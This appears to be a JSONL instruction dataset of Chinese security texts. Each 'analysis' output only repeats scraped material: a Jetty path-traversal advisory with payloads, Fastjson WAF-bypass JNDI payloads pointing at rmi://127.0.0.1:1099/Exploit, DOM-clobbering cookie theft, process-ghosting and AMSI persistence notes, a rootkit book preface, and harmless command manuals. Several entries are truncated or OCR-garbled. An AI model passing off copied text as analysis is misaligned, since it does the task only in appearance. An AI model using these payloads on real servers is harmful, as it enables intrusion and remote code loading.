{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-34429) [中文版本(Chinese version)](README.zh-cn.md) Eclipse Jetty is a Java web server and Java Servlet container. Jetty 9.4.40 fixed an ambiguous paths information disclosure vulnerability [CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164), CVE-2021-34429 is a variation and bypass of it. There are 3 types of payload that exfiltrate the content of `WEB-INF/web.xml`: - Unicode based URL encoded: `/%u002e/WEB-INF/web.xml` - `\\0` with `.` bug: `/.%00/WEB-INF/web.xml` - `\\0` with `..` bug: `/a/b/..%00/WEB-INF/web.xml` The vulnerability affects the Jetty 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5. References: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm - https://xz.aliyun.com/t/10039 ## Vulnerable Application Execute the following command to start a Jetty 9.4.40 server. ``` docker compose up -d ``` After the server starts, visit ``http://your-ip:8080`` to see an example page. ## Exploit The sensitive file web.xml is not accessible through `/WEB-INF/web.xml`. ![](1.png) Use payload `/%u002e/WEB-INF/web.xml` to bypass the restriction: ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRoom for Escape: Scribbling Outside the Lines of Template Security 1 Alvaro Muñoz @pwntester Staff Security Researcher Oleksandr Mirosh @olekmirosh Security Researcher 2 Content Management Systems (CMS)  A CMS is an application that is used to manage web content  Allows multiple contributors to create, edit and publish.  Content is typically stored in a database and displayed in a presentation layer based on a set of templates.  Templates normally support a subset of programming language capabilities so they are normally sandboxed 3 Our Research  What:  .NET and Java based CMSs  Assumption:  We can control Templates  Goal:  Escape Template sandboxes 4 Agenda 1. Introduction 2. .NET (SharePoint)  Introduction to SharePoint ASPX pages  Safe Mode  Breaking out of Safe Mode  Demo 3. Java  Engines and CMSs  Generic (object-based) Bypasses  Specific Engine Bypasses 4. Conclusions 5 SharePoint 6 Site Pages  A.K.A. user-defined pages  play role of templates for rendering dynamic content  stored in content database  can be customized by regular users  processed in safe mode Application Pages  A.K.A. system pages  implement server-side logic  stored on file system  cannot be changed by regular users  processed as regular unrestricted ASPX files VS SharePoint ASPX Pages 7 SPVirtualPathProvider SystemPage.aspx UserPage.aspx safe mode SPPageParserFilter Content DB normal mode File System 8 SharePoint ASPX Pages <%@ Page %> <%@ Import Namespace=\"System\" %> <script runat=\"server\"> public string ServerSideFunction() { return \"Hello World\"; } </script> <% Lb1.Text = \"Hello, world!\"; %> <html> <body> <asp:Label runat=\"server\" id=\"Lb1\" /> <asp:Label runat=\"server\" id=\"Lb2\" Text=\"<%# ServerSideFunction%>\" /> <%-- server-side comments --%> <!-- #include virtual =\"/myapp/footer.inc\" --> </body> </html> directive attribute in directive server-side code block embedded server-side code server-side control data-binding expression server-side comment server-side include directive 9 SharePoint", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nread === 从键盘读取变量值 ## 补充说明 **read命令** 从键盘读取变量的值通常用在shell脚本中与用户进行交互的场合该命令可以一次读取多个变量的值变量和输入的值都需要使用空格隔开在read命令后面如果没有指定变量名读取的数据将被自动赋值给特定的变量REPLY ### 语法 ```shell read(选项)(参数) ``` ### 选项 ```shell -p指定读取值时的提示符 -t指定读取值时等待的时间秒 ``` ### 参数 变量指定读取值的变量名 ### 实例 下面的列表给出了read命令的常用方式 ```shell read 1987name 从标准输入读取输入并赋值给变量1987name ``` ```shell read first last 从标准输入读取输入到第一个空格或者回车将输入的第一个单词放到变量first中并将该行其他的输入放在变量last中 ``` ```shell read 从标准输入读取一行并赋值给特定变量REPLY ``` ```shell read -a arrayname 把单词清单读入arrayname的数组里 ``` ```shell read -p \"text\" 打印提示text等待输入并将输入存储在REPLY中 ``` ```shell read -r line 允许输入包含反斜杠 ``` ```shell read -t 3 指定读取等待时间为3秒 ``` ```shell read -n 2 var 从输入中读取两个字符并存入变量var不需要按回车读取 ``` ```shell read -d \":\" var 用定界符:结束输入行 ``` ## read命令示例 从标准输入读取输入并赋值给变量1987name ```shell #read 1987name #等待读取输入直到回车后表示输入完毕并将输入赋值给变量answer HelloWorld #控制台输入Hello #echo $1987name #打印变量 HelloWorld ``` 等待一组输入每个单词之间使用空格隔开直到回车结束并分别将单词依次赋值给这三个读入变量 ```shell #read one two three 1 2 3 #在控制台输入1 2 3它们之间用空格隔开 #echo \"one = $one, two = $two, three = $three\" one = 1, two = 2, three = 3 ``` REPLY示例 ```shell #read #等待控制台输入并将结果赋值给特定内置变量REPLY This is REPLY #在控制台输入该行 #echo $REPLY #打印输出特定内置变量REPLY以确认是否被正确赋值 This is REPLY ``` -p选项示例 ```shell #read -p \"Enter your name: \" #输出文本提示同时等待输入并将结果赋值给REPLY Enter you name: stephen #在提示文本之后输入stephen #echo $REPLY stephen ``` 等待控制台输入并将输入信息视为数组赋值给数组变量friends输入信息用空格隔开数组的每个元素 ```shell #read -a friends Tim Tom Helen #echo \"They are ${friends[0]}, ${friends[1]} and ${friends[2]}.\" They are Tim, Tom and Helen. ``` **补充一个终端输入密码时候不让密码显示出来的例子** 方法1 ```shell #!/bin/bash read -p \"输入密码\" -s pwd echo echo password read, is \"$pwd\" ``` 方法2 ```shell #!/bin/bash stty -echo read -p \"输入密码\" pwd stty echo echo echo 输入完毕 ``` 其中选项`-echo`禁止将输出发送到终端而选项`echo`则允许发送输出 使用read命令从键盘读取变量值并且将值赋给指定的变量输入如下命令 ```shell read v1 v3 #读取变量值 ``` 执行上面的指令以后要求键入两个数据如下所示 ```shell Linux c+ #输入数据 ``` 完成之后可以使用echo命令将指定的变量值输出查看输入如下命令 ```shell echo $v1 $v3 #输出变量的值 ``` 执行输出变量值的命令以后将显示用户所输入的数据值如下所示 ```shell Linux c+ #输出变量值 ``` 注意使用echo命令输出变量值时必须在变", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n译者序 本书由 kuang110 和我共同翻译完成其中笫 23456 章为 kuang110 翻译其它 的由本人翻译由于是两人翻译的而每个人的翻译风格可能会不同所以当你在书中看 到一个单词有两个完全不同的翻译时请不要惊讶且由于本人翻译水平有限不足之处在所 难免但在翻译时我会尽量避免用一些晦涩难懂的长句 本书的所讲的主要内容请看介绍部分个人对本书的评价是适合有 C 语言基础而且有 对驱动开发有一定的了解的人阅读因为本书是介绍 rootkit 而不是介绍驱动开发的所以 对于什么是 DriverEntry什么是卸载例程这些不会详细的讲解本书适合于 rootkit 的入门 讲的都是比较基础的东西里面所讲的技术不会太高深而且这些技术都是比较老比较落后 了的但是要知道万丈高楼平地起不打好基础又如何去学习高深的技术所以对于要了解 什么是 rootkitrootkit 是如何工作的它们都的什么功能如何编写一个 rootkit 以及 rootkit 的基本检测与防护技术等等本书还是足够了的 本书翻译版首发于看雪论坛论坛上有每一章的 word 版需要的到论坛上找找 最后祝大家有一个愉快的旅程 demoscene 2011 年 1 月 8 日 关于作者 村 Ric Vieler 是一个软件工程师和经过认证的道德黑客他喜欢编写技术手册例如 Professional Rootkits和科幻小说例如 Spliced, Acknowledge, 和 A Stitch in Time他沉迷 于对对计算机内部未公开和各种东西有一个透切的了解在他职业生涯的高潮终于达到了 专业的黑客攻击在不玩黑不读书不写文章时Ric 的空闲时间都陪着他的妻子 Lisa 和 他们的两个孩子Samantha 和 Dylan 参与人员 Executive Editor Carol Long Development Editor Ed Connor Technical Editor John Heasman Production Editor William A. Barton Copy Editor Luann Rouff Editorial Manager Mary Beth Wakefield Production Manager Tim Tate Vice President and Executive Group Publisher Richard Swadley Vice President and Executive Publisher Joseph B. Wikert Graphics and Production Specialists Brooke Graczyk Joyce Haughey Alicia B. South Quality Control Technicians Christine Pingleton Charles Spencer Project Coordinator Erin Smith Media Development Specialists Angie Denny Kit Malone Kate Jenkins Steve Kudirka Proofreading and Indexing Christine Sabooni and Estalita Slivoskey Anniversary Logo Design Richard J. Pacifico 介绍 什么是专业的 Rootkit Rootkit Rootkit Rootkit Hacker Defender, HE4Hook, Vanquish, NT Rootkit, FU, AFX Rootkit这是一些感染了全 世界几百万台计算机的 rootkit 的名字这些 rootkit 有很多的共同点它们都是由一个或者 最多是几个程序员编写出来的它们都能够在未经授权的情况下去访问某些信息它们都使 用了一些隐藏技术以防止被检测到并且它们使用这些技术并不是为了自己的某些目的 一个 rootkit 的目的是什么呢程序员认为它们的目的有很多一些是作为可以使一个 网站超负荷运行的网络僵尸客户端一些是为了发送一些我们每天早上都会在我们的电 子邮件里看到的垃圾邮件一些作为一个进入其它安全的网络的桥梁其它的是为了收集我 们的个人信息来娱乐或者获取利益这些目都影响着最终的 rootkit 产品是什么我会更精 确地把它们称做是临时软件这些软件会被它们的目的所限制这些目的都是非法的 不道德的破坏性的或者是没有意义的在这些伪装下开发的软件通常不能称之为工具 材料和用来开发商用级软件的专业知识 本书将跳过这种临时 rootkit看向专业 rootkit 的新兴领域 网友们把专业定义为符合一个专业的技术或道德", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2017年\"Process Doppelganging\", NTFS+section https://github.com/hasherezade/process_doppelganging https://www.youtube.com/watch?v=Cch8dvp836w 进程的创建不支持NTFS transacted文件,所以分割进程的步骤寻找创建方法 跟踪 CreateProcessW 调用 xp NtOpenFile NtCreateSection NtCreateProcessEx ... NtCreateThreadEx 在win10下直接使用 NtCreateUserProcess 创建看起来无法使用ntfs了但是微软为了 兼容也可以使用之前xp的创建进程的方法 2018年 transacted_hollowing https://github.com/hasherezade/transacted_hollowing 进程替换只是利用了ntfs translation 和 file delete pending 2021年 Process Ghosting https://github.com/hasherezade/process_ghosting 使用 delete pending file + Process Doppelganging的手法 NTFS Transactions Delete Pending 逆向 DeleteFileW 可以看到使用 NtOpenFile -> NtQueryInfomationFile -> NtClose 用NtOpenFile打开的文件只需要设置delete标志使用 NtSetInformationFile(FileDispositionInformation) 设置文件为delete-pending 写入文件因为文件状态是delete-pending,内容可以写入但是其他外部文件读取会失败 当关闭文件句柄时文件也会被删除", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原链接,我做个复现. https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/ <https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/> https://twitter.com/netbiosX/status/1282051493676417028 <https://twitter.com/netbiosX/status/1282051493676417028> 出现错误的话. 试试 然后效果就是这样 视频上传到B站了 bilibili:RedTeamWing 前 利 lcewirg nANILKOITSLAaS-OO.星rA SscLseRAeuSnJLON MiCRosoftNindws14.18362.900 CL201MicRosoftCorporationoE C:YUsersYXuanJiansuhoami whoam desktop-tigjskaxuanjian CALUSCRsIXuanJianhaha haha HaDOOGBTTTZIDEmtoTeiZLE \"haha' ABBBBOLOO c:LUseRSIXUaNJiaN2 回 WORSNASGML 1 rvs 1 net user administrator /active:yes", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: dnswalk categories: Information Gathering tags: [dnswalk,information gathering,recon,dns,kali linux] date: 2016-10-21 10:07:46 --- 0x00 dnswalk介绍 ------------- dnswalk是一个DNS调试器它执行指定域的传送并以多种方式检查数据库内部一致性以及准确性 工具来源http://sourceforge.net/projects/dnswalk/ [dnstracer主页][1] | [Kali dnstracer Repo仓库][2] - 作者David Barr - 证书Artistic 0x01 dnswalk功能 --------------- ```shell root@kali:~# dnswalk --help 用法: dnswalk [-选项[-更多选项]] [--] [程序参数1 ...] 接受以下单字符选项: 该选项有参数: -D 布尔型(没有参数): -r -f -i -a -d -m -F -l 选项可以合并在一起--stop选项不做合并处理 选项及其参数之间不需要空 示例: dnswalk domain.com. 输入的域名必须以'.'结束 ``` ```shell -r 递归向下查询指定域的子域 -a 打开重复A记录的警告 -d 打印调试和'状态'信息到stderr仅在重定向stdout时使用 -m 仅在上次运行后域已被修改时才执行检查 -F 执行\"fascist\"检查在检查A记录时不匹配每个IP地址的PTR名称与转发名称和报告 -i 禁止检查域名中的无效字符 -l 执行\"lame delegation\"检查 对于每个NS记录检查列出的主机是否确实是此域返回的权威答应 ``` 0x02 dnswalk用法示例 ----------------- ```shell root@kali:~# dnswalk www.harvard.edu. Checking www.harvard.edu. BAD: SOA record not found for www.harvard.edu. BAD: www.harvard.edu. has NO authoritative nameservers! BAD: All zone transfer attempts of www.harvard.edu. failed! 0 failures, 0 warnings, 3 errors. ``` 现在大多都没有域传送的漏洞了这个工具现在比较鸡肋 [1]: http://sourceforge.net/projects/dnswalk/ [2]: http://tools.kali.org/information-gathering/dnswalk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrev === 将文件内容以字符为单位反序输出 ## 补充说明 **rev命令** 将文件中的每行内容以字符为单位反序输出即第一个字符最后输出最后一个字符最先输出依次类推 ### 语法 ```shell rev(参数) ``` ### 参数 文件指定要反序显示内容的文件 ### 实例 ```shell [root@localhost ~]# cat iptables.bak # Generated by iptables-save v1.3.5 on Thu Dec 26 21:25:15 2013 *filter :INPUT DROP [48113:2690676] :FORWARD accept [0:0] :OUTPUT ACCEPT [3381959:1818595115] -A INPUT -i lo -j ACCEPT -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A OUTPUT -o lo -j ACCEPT COMMIT # Completed on Thu Dec 26 21:25:15 2013 [root@localhost ~]# rev iptables.bak 3102 51:52:12 62 ceD uhT no 5.3.1v evas-selbatpi yb detareneG # retlif* ]6760962:31184[ PORD TUPNI: ]0:0[ TPECCA DRAWROF: ]5115958181:9591833[ TPECCA TUPTUO: TPECCA j- ol i- TUPNI A- TPECCA j- 22 tropd-- pct m- pct p- TUPNI A- TPECCA j- 08 tropd-- pct m- pct p- TUPNI A- TPECCA j- DEHSILBATSE,DETALER etats-- etats m- TUPNI A- TPECCA j- pmci p- TUPNI A- TPECCA j- ol o- TUPTUO A- TIMMOC 3102 51:52:12 62 ceD uhT no detelpmoC # ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n浅谈Fastjson绕waf 写在前 关键时期换个味虽然是炒陈饭但个认为有货的慢慢看从最简单到些个认 为较骚的本垃圾代码狗没有实战经验因更多是从fastjson的词法解析部分构造混 淆 初级篇 添加空字符 在 com.alibaba.fastjson.parser.JSONLexerBase#skipWhitespace public final void skipWhitespace() { while(true) { while(true) { if (this.ch <= '/') { if (this.ch == ' ' || this.ch == '\\r' || this.ch == '\\n' || this.ch == '\\t' || this.ch == '\\f' || this.ch == '\\b') { this.next(); continue; } if (this.ch == '/') { 不难看出默认会去除键值外的空格 \\b  \\n  \\r  \\f 等作为开胃菜 默认开启的Feature中得到的思路 添加多个逗号 FastJson中有个默认的Feature是开启的 AllowArbitraryCommas 这允许我们多个逗号 这可以添加的位置很多 this.skipComment(); continue; } } return; } } } json字段名不被引号包括 也是个默认开启的Feature AllowUnQuotedFieldNames 但是只在恢复字段的过程调 当中有效果 因此原来的payload可以做此改造 {,,,,,,\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",,,,,,\"dataSourceName\":\"rmi: //127.0.0.1:1099/Exploit\",,,,,, \"autoCommit\":true} {\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1 :1099/Exploit\", \"autoCommit\":true} || \\/ {\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",dataSourceName:\"rmi://127.0.0.1:1 099/Exploit\", \"autoCommit\":true} json字段名使单引号包裹 Feature.AllowSingleQuote 也是默认开启滴这个太简单了就不说了 @type后的值第个引号可以替换为其他字符 主要是个逻辑问题 这我们可以对之前获取 @type 的过程先检验了当前位置是 \" 再扫描到下个 \" 之间的 值 因此可以构造出,注意 com 前的引号被我改了, {\"@type\":xcom.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0 .1:1099/Exploit\", \"autoCommit\":true} 编码绕过(Unicode/Hex) 先在 com.alibaba.fastjson.parser.JSONLexerBase#scanSymbol ,当中可以看见 如果遇到了 \\u 或者 \\x会有解码操作 if (ch == '\"') { key = lexer.scanSymbol(this.symbolTable, '\"'); lexer.skipWhitespace(); ch = lexer.getCurrent(); //省略不必要代码 } 还可以混合编码这步到位 对字段添加多个下划线或者减号 1.2.36版本前 在 com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#parseFie ld 解析字段的key的时候调了 smartMatch 下截了与本主题相关的关键点 {\"\\x40\\u0074\\u0079\\u0070\\u0065\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourc eName\":\"rmi://127.0.0.1:1099/Exploit\", \"autoCommit\":true} 由于这有 break 不持两个起混合使只能单使其中个随便加 1.2.36版本及以后 我们再来看这个 smartMatch 调了 com.alibaba.fastjson.util.TypeUtils#fnv1a_64_lower {\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",'d_a_t_aSourceName':\"rmi:/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDOM Clobbering攻击学习 DOM Clobbering攻击其实算是比较老的攻击手法了只是之前只知道最基本的dom-xss没有去深入 了解过今天看到相关文章觉得挺有意思所以学习记录一下 概念 DOM破坏是一种将构造的特殊HTML代码注入到页面中以操纵DOM并最终更改页面上JavaScript行为的 技术在无法使用XSS的情况下DOM破坏尤其有用可以在属性id或name被HTML过滤器列入白名单 的页面上控制某些HTML DOM破坏的最常见形式是使用锚元素覆盖全局变量然后该全局变量将被应 用程序以不安全的方式使用例如生成动态脚本URL 相关知识 dom对windows对象的影响 首先下面这是个正常的弹窗功能的html代码 然而有一个小知识就是在HTML里设定一个有id的元素之后在JS里就能存取操作它 而因为JS的scope链我们可以直接操作btn <body> <button id=\"btn\">click me</button> <script> document.getElementById('btn') .addEventListener('click', () => { alert(1) }) </script> </body> 所以最开始的代码可以简化为 不需要 getElementById等操作他会自动一层层向上查询到windows对象 而除了id可以直接用windows直接存取操作外还有四个tag用name也可以 DOM Clobbering 由以上我们可以得知我们可以根据特殊构造的HTML去影响JS原本的运行这也是DOM破坏攻击的基本 构造一个留言板场景如下 <body> <button id=\"btn\">click me</button> <script> btn.onclick = () => alert(1) </script> </body> <embed name=\"test1\"></embed> <form name=\"test2\"></form> <img name=\"test3\" /> <object name=\"test4\"></object> 众所周知现在的开发安全在服务端会写很多安全规则来过滤一些关键词来防御XSS让你构造的恶意js 无法执行使得XSS无效 但是由于一些功能的要求比如插入图片等等某些地方还是会支持正常的html语句比如 <div>  <a> 等等 于是我们可以插入一个id是test_name的div标签通过if判断再用a标签设置恶意payload 可以看到成功打到了cookie 用a标签构造的原因 在toString时会回传url并且可通过href属性来设置url让其可控 所以DOM Clobbering攻击分两步走 1. 用html构造含id属性的语句影响JS中的变量 2. 用a标签搭配href达到恶意攻击 不过这种攻击需要注意的一点就是如果攻击的变量以及被定义了那么用DOM覆盖不掉 多层级的 DOM Clobbering <!DOCTYPE html> <html> <head> <script> TEST_MODE = 1 </script> </head> <body> <div id=\"TEST_MODE\"></div> <script> console.log(window.TEST_MODE) // 1 </script> </body> </html> 如果需要覆盖的对象由多个层级有以下几个办法构造 1. 利用HTML标签的层级关系 可以利用 form[name] 或是 form[id] 去拿它下层的元素去构造多层DOM clobbering 这种情况就没有a标签不能直接用了 2. 特性HTMLCollection HTMLCollection 是 HTML 元素的集合类似一个包含 HTML 元素的数组列表 在Window对象窗口中确定命名属性名称的值的时候如果对象只有一个元素则返回该元素 否则返回以窗口的关联文档为根的HTMLCollection该HTMLCollection的过滤器仅匹配名称为 window的命名对象 根据定义这些都是元素 而我们可以利用 name 或是 id 去拿 HTMLCollection 里面的元素 <!DOCTYPE html> <html> <body> <form id=\"test\"> <input name=\"a\" /> <button id=\"b\"></button> </form> <script> console.log(test) // <form id=\"test\"> console.log(config.a) // <input name=\"a\" /> console.log(config.b) // <", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPresenter Jeff Yestrumskas Sr. Manager, InfoSec @ SaaS org. Personal DEFCON attendee:presenter ratio = 10:1 Presenter Matt Flick Principal, FYRM Associates Information Assurance Consulting Beer connoisseur Agenda What is XAB? XAB History Whats New? Nitty Gritty XAB Process Flow Live Demo Wrap-up What is XAB? Anonymous browsing tunneled over XSS Victim/Participant transfers data XAB History Idea Introduced @ Black Hat DC 2009 Working Demo Released PoC Whats New? Solution to the HTTP referrer problem Improved content handling ... Nitty Gritty Three components XABAttacker (core of it all) HTTProxab (everyday HTTP proxy with XAB mods) CDProxy (its seedy alright) XAB Process Flow Live Demo Wrap-up That was fast! Further reading... Download XAB @ www.fyrmassociates.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 注入的产生 1. 程序在开发的时候没对用户的数据过滤把用户的数据都当做可信数据 2. 过滤不严格 3. 数据库配置不当 4. 转义不当 # 0x01 注入的类型 常见的注入我们可以归纳为数字型字符型搜索型,盲注等 ``` select * from admin where id = $id; //数字型 注入 select * from admin where id = '$id'; //字符型 select * from admin where id = \"$id\"; select * from admin where id = ($id); select * from admin where id = ('$id'); select * from admin where id = (\"$id\"); select * from admin where username like '%adm%'; select * from admin where username like ('%adm%'); select * from admin where id = $id limit 0,1; select * from admin order by $id; select * from admin order by limit 0,1 $id; select * from admin order by id limit 1,1 $id; insert注入 update注入 delete注入 二次注入 等等 ``` 实际环境中我们可能还会遇到更为复杂的sql注入语句我们就要想办法闭合它 # 0x03 寻找注入的一些注意 如何寻找注入是一门艺术黑盒测试它建立在对每个参数的fuzz上当然如果你有开发经验拿到一套程序就能敏锐的发现注入 但凡涉及到用户交换地方都将是注入的重灾区所以你可以适当的学习一下开发 1. 当网站为成熟的cms框架时不建议直接黑盒注入可以直接审计源码或者搜索漏洞 2. 判断为自己开发的系统目标不是很重要可以尝试使用AWVS 等工具 3. 信息收集的重要性可能它的源码就在GitHub上或者一个备份文件 # 0x03 文末 #### 本文如有错误请及时提醒避免误导他人 * author404", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho am I ? Scope of this presentation  We present a new class of vulnerabilities,  Affecting multiple pre-boot authentication software under x86 and x64 architectures,  Exploitable without physical access. Limitations : we will focus on password based authentication solely. Contents  (Technically) defining pre-boot authentication  Password leakage under Windows  Password leakage under *nix  Rebooting in spite of a pre-boot authentication  Examples of vulnerable software  Mitigating those vulnerabilities I - (Technically) defining pre-boot authentication  Boot sequence overview  Taxonomy of pre-boot authentication software  BIOS API for user inputs  BIOS internals for keyboard management  BIOS keyboard buffer Remanence...  Verifying this bug exists in real life  Password chaining I-1) Boot sequence overview I-2) Taxonomy of pre-boot authentication softwares  Bios Passwords  Bootloader Passwords (Vista's Bitlocker, Grub or Lilo, and most others pre-boot authentication software : Truecrypt, Diskcryptor...)  Early kernel stage passwords  typically before decompression (eg: suspend2 hibernation patch for GNU/Linux) I-3) BIOS API for user inputs (1/2)  Interruption 0x16 invoked via functions :  ah=0x00 , Get keystroke : returns the keystroke scancode in AH and its ASCII code in AL.  ah=0x01 , Check for keystroke : idem, but the Zero Flag is set if no keystroke is available in the Bios keyboard buffer. I-3) BIOS API for user inputs (2/2)  eg : lilo password reading routine : I-4) BIOS internals for keyboard management I-5) BIOS keyboard buffer Remanance... (1/3)  Filling the BIOS keyboard buffer (with the keyboard) : I-5) BIOS keyboard buffer Remanence... (2/3)  Reading the BIOS keyboard buffer (using int 0x16, ah=0x00 or 0x01) : I-5) BIOS keyboard buffer Remanence... (3/3)  Who is supposed to clear the keyboard buffer ? I-6) Verifying this bug exists in real life (1/2) :  We want to check the authentication routines in the BIOS themselves (aka: BIOS Passwords)  We will wr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/2/22 17:19 1.md file:///Users/s3gundo/Documents/markdown/vulns/java/jira/1.md 1/18 jira环境搭建及受限件读取原理和深思CVE- 2021-26086 踩坑 坑太多了 装了差不多七个时才装好 也是给找些经验不过不得不说在装软件的同时 也学到了常多的东实战的项感觉就是会有不样的感觉多动总是会有好处的 我先发个步骤 然后罗列下我猜到的些坑的点算是把这个环境给装好了因为我是mac系 统参照着个步骤来的但是中间夹在的另外的因为不是通的破解插件怕踩坑了 安装步骤 https://blog.csdn.net/pang787559613/article/details/101269073 https://www.jianshu.com/p/da0ddd124be8 前半部分基本按照第个链接后半部分按照第个链接进配置 坑点 其实为了兼容后的软件 mysql5.7的安装是较好的既可以兼容前版本的软件后的新 版也会兼容这个感觉相当于java8样地位的存在在这我选取的是5.7.31 并且不是 homebrew安装的感觉坑还挺多的 mysql我在安装的过程中其实会遇到经典问题就是第次登录会拒绝登录所以般先安 全模式启动然后修改密码并 flush privilege 就可以了 mac上mysql的安装默认不会成 /etc/my.cnf 的配置件需要touch个并写 个默认的配置 配置上jira默认需要的字符集和ssl的问题 因为emoji等表情符号的出现更泛的编码集需要拥抱时代的变化所以我们尽可能的再去抛弃 utf8转向utf8mb4就像jira那样(utf8mb4是utf8的超集理论上由utf8升级到utf8mb4字符编码 没有任何兼容问题) https://confluence.atlassian.com/adminjiraserver/connecting-jira-applications-to-m 这是字符集的解决办法 注意mysqld和client下对应的配置别写反了 [client] #jira config default-character-set = utf8mb4 default-character-set=utf8mb4 2022/2/22 17:19 1.md file:///Users/s3gundo/Documents/markdown/vulns/java/jira/1.md 2/18 三之前直按照前的步骤使试版的密钥后来我去官上查看使密钥是不需要联 的所以不是址被ban的问题况且我还挂了全局代理之后我将问题翻译为英去jira 的社区看看 #password = your_password port = 3306 socket = /tmp/mysql.sock # Here follows entries for some specific programs # The MySQL server [mysqld] character-set-client-handshake = FALSE character-set-server = utf8mb4 collation-server = utf8mb4_unicode_ci default-storage-engine=INNODB character_set_server=utf8mb4 innodb_default_row_format=DYNAMIC innodb_large_prefix=ON innodb_file_format=Barracuda innodb_log_file_size=2G skip_ssl #这是忽略ssl安全连接的问题 这是创建jira对应数据库时 添加所需要的数据集 CREATE DATABASE Jira CHARACTER SET utf8mb4 COLLATE utf8mb4_bin; ALTER DATABASE Jira DEFAULT CHARACTER SET = utf8mb4 DEFAULT COLLATE = utf8mb4_bin 检查修改 mysql> SHOW VARIABLES WHERE Variable_name LIKE 'character\\_set\\_%' OR Variable_nam 修复&优化所有数据表 > mysqlcheck -u root -p --auto-repair --optimize --all-databases mac上mysql的重启命令 > sudo /usr/local/mysql/support-files/mysql.server restart We're unabl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nntpdate === 使用网络计时协议NTP设置日期和时间 ## 补充说明 **ntpdate命令** 是用来设置本地日期和时间它从指定的每个服务器获得了一些样本并应用标准 NTP 时钟过滤器和选择算法来选择最好的样本 此 ntpdate 命令使用以下方法进行时间调整 * 如果它确定时钟偏差超过 0.5 秒它通过调用 settimeofday 子例程设置时钟时间在引导时间这是一个首选的方法 * 如 果它确定时钟偏差小于 0.5 秒它通过调用 adjtime 子例程和偏移量来调整时钟时间此方法倾向于用牺牲一些稳定性来保持漂移时钟更加准确 当不是通过运行一个守护程序而是从 cron 命令有规则的运行ntpdate 命令时每一小时或两小时执行一次可以保证足够的走时精度从而避免调整时钟 使用很多服务器可以大幅度改善 ntpdate 命令的可靠性与精度尽管能使用单一服务器但您能通过提供至少三个或四个服务器以获得更好的性能 如果一个类似 xntpd 守护程序的 NTP 服务器守护程序正在同一主机上运行命令将拒绝ntpdate 设置日期 你必须有 root 权限才能在主机上运行这个命令 ### 语法 ```shell ntpdate [ -b] [ -d] [ -s] [ -u] [ -aKeyid] [ -eAuthenticationDelay] [ -kKeyFile] [ -oVersion] [ -pSamples] [ -tTimeOut] Server... ``` ### 选项 ```shell -aKeyid # 使用 Keyid 来认证全部数据包 -b # 通过调用 settimeofday 子例程来增加时钟的时间 -d # 指定调试方式判断 ntpdate 命令会产生什么结果不产生实际的结果结果再现在屏幕上这个标志使用无特权的端口 -eAuthenticationDelay # 指定延迟认证处理的时间秒数 -kKeyFile # 当不使用缺省值 /etc/ntp.keys 文件时为包含密钥的文件指定一个不同的名称 请参阅文件KeyFile的描述 -oVersion # 当轮询它的发出数据包时指定使用的 NTP 版本实现 Version 的值可以是 123缺省值是 3 -pSamples # 指定从每个服务器获取的样本的数目 Samples 的值在 1 和 8 之间并包括 1 和 8它的缺省值是 4 -s # 指定日志操作 syslog 设施的使用而不是使用标准输出 当运行 ntpdate 命令和 cron命令时它是很有用的 -tTimeOut # 指定等待响应的时间给定 TimeOut 的值四舍五入为 0.2 秒的倍数缺省值是 1 秒 -u # 指定使用无特权的端口发送数据包 当在一个对特权端口的输入流量进行阻拦的防火墙后是很有益的 并希望在防火墙之外和主机同步防火墙是一个系统或者计算机它控制从外网对专用网的访问 ```", "category": "text_analysis", "source": "security_papers"}
